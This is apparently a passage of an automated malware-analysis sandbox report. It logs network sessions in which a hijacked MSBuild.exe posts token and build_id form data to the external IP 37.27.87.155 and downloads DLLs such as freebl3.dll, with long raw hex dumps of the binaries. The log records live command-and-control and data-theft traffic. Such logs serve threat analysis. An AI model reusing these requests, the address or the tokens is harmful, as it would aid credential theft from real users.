                                                                                                                                                                                                                                                                          2024-04-20 12:28:15 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                          Data Ascii: X~e!*FW|>|L1146
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                                                                                                                                                                                                          Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                                                                                                                                                                                                          Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                                                                                                                                                                                                          Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                          Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                          Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                                                                                                                                                                                                          Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                                                                                                                                                                                                          Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                                                                                                                                                                                                          2024-04-20 12:28:16 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                                                                                                                                                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          7192.168.2.44974437.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:17 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 4677
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:17 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------EGIIIECBGDHJJKFIDAKJCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:18 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          8192.168.2.44974537.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:19 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 1529
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:19 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------BGHJJDGHCBGDHIECBGIDCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:19 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          9192.168.2.44974637.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:20 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFB
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:20 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------IEHIIIJDAAAAAAKECBFBCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:20 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          10192.168.2.44974737.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:21 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKF
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Content-Length: 437
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:21 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 32 39 37 30 32 32 64 36 62 35 30 33 36 64 62 35 37 61 35 32 39 31 31 61 34 37 62 66 38 64 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 35 66 34 30 39 31 31 35 35 37 63 34 63 63 32 33 34 37 34 64 35 37 36 31 30 35 36 38 65 65 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="token"7297022d6b5036db57a52911a47bf8d9------FHDHCAAKECFIDHIEBAKFContent-Disposition: form-data; name="build_id"b5f40911557c4cc23474d57610568eeb------FHDHCAAKECFIDHIEBAKFCont
                                                                                                                                                                                                                                                                          2024-04-20 12:28:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:21 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-04-20 12:28:22 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          11192.168.2.44974837.27.87.1554434076C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-04-20 12:28:22 UTC156OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                                                          Host: 37.27.87.155
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-04-20 12:28:22 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:22 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                          Content-Length: 685392
                                                                                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          2024-04-20 12:28:22 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
